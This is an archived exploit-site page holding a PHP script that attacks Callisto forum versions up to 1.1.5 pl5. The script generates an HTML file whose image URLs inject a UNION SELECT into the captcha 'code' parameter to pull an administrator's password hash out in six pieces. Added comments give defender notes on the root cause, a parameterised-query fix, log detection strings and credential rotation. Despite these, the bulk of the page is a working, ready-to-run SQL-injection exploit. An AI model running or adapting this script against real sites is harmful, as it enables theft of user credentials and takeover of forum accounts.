Callisto <= 1.1.5 pl5 SQL Injection / Credentials Disclosure Exploit
Posted on 29 April 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Callisto <= 1.1.5 pl5 SQL Injection / Credentials Disclosure Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================================== Callisto <= 1.1.5 pl5 SQL Injection / Credentials Disclosure Exploit ==================================================================== <?php
################################################################################
# Exploit Title: Callisto <= 1.1.5 pl5 SQL Injection / Credentials Disclosure Exploit
#
# Software Callisto 1.1.5 pl5
# Date: 2010-04-29
# Author: GLOBUS
# Software Link: http://www.unisolutions.pl
# Version: <= 1.1.5 pl5
# category: SQLi
#
# Greetz: hds, Neo, pok3, .xXx., j4ck, revel004, Kopaczka
################################################################################

# NOTE(review): reading guide for defenders.
# - Every request this listing generates goes to index.php with act=captcha and
#   carries a UNION SELECT in the `code` parameter that reads user_password
#   from the users table. The server-side code is not shown here; the presumed
#   root cause is that `code` is concatenated into a SQL statement unvalidated.
# - Application-side fix: accept `code` only as an integer (cast or reject) and
#   build the query with bound parameters instead of string concatenation.
# - Detection: in web-server access logs, look for act=captcha requests whose
#   `code` value contains anything other than digits (for this listing: UNION,
#   SELECT, SUBSTRING, user_password), typically six in quick succession.
# - The hash format stated below is md5(md5(pass).md5(pass)) with no salt, so a
#   disclosed hash should be handled as a disclosed password: rotate the
#   affected credentials and move storage to password_hash()/password_verify().

# Usage guard: exactly two CLI arguments are required (forum URL, numeric user
# id); otherwise the banner and usage text are printed and the script exits.
if($argc !== 3) {
    echo "#------------------------------------------------------------------------- ";
    echo "# Callisto <= 1.1.5 pl5 SQL Injection / Credentials Disclosure Exploit ";
    echo "# Author: GLOBUS ";
    echo "# Greetz: hds, Neo, pok3, .xXx., j4ck, revel004, Kopaczka ";
    echo "#------------------------------------------------------------------------- ";
    echo "# php exploit.php [FULL FORUM URL] [ADMIN_ID] # ";
    echo "# php exploit.php http://www.evil.pl/forum/ 1 # ";
    echo "#------------------------------------------------------------------------- ";
    exit;
}

# Normalise the base URL so it always ends with a slash.
$path = (substr($argv[1], -1) !== '/' ? $argv[1] .'/' : $argv[1]);
# The user id is cast to int before it is placed into the generated URLs.
$uid = (int) $argv[2];

# The script only writes a local HTML file next to itself; it sends no request.
$fp = fopen(dirname(__FILE__) . '/callisto_exploit.html', 'w');
if(!$fp) {
    echo "Can't Create File callisto_exploit.html ";
    exit;
}

# Static header for the generated file: it states the hash construction and a
# worked example (password "test") split into the same six parts the loop
# below requests. The "I => 1" heading is presumably a reading hint for the
# rendered characters; the listing does not explain it.
$info = "#-------------------------------------------------------------------------<br /> ";
$info .= "# Callisto <= 1.1.5 pl5 SQL Injection / Credentials Disclosure Exploit<br /> ";
$info .= "# Author: GLOBUS<br /> ";
$info .= "#-------------------------------------------------------------------------<br /><br /> ";
$info .= "Hash = <strong>md5(md5($pass).md5($pass));</strong><br />Password <strong>test</strong> => Hash <strong>db2d303c20b9468bbe90114d3d1874b3</strong><br /> Part 1: <strong>db2d30</strong></br /> Part 2: <strong>3c20b9</strong></br /> Part 3: <strong>468bbe</strong></br /> Part 4: <strong>90114d</strong></br /> Part 5: <strong>3d1874</strong></br /> Part 6: <strong>b3</strong></br /></br /><h2>I => 1</h2></br /></br /> ";
fwrite($fp, $info);

# 1-based start offsets passed to SUBSTRING(user_password, offset, 6): six
# windows that together span a 32-character hash (the last yields 2 characters,
# matching "Part 6" in the example above).
$substr = array(1, 7, 13, 19, 25, 31);
$c = 1;
foreach($substr as $int) {
    # One <img> per window. Presumably the captcha endpoint renders the selected
    # value as an image, so the requests are issued by whichever browser opens
    # the generated file. That cannot be confirmed from this listing alone.
    $save = "Part {$c}: <img src="{$path}index.php?act=captcha&code=1+AND+1=2+UNION+SELECT+SUBSTRING(user_password,{$int},6)+FROM+users+WHERE+user_id={$uid}" /><br /> ";
    fwrite($fp, $save);
    $c++;
}
fclose($fp);
echo "Done, run callisto_exploit.html";
?> # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-29]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>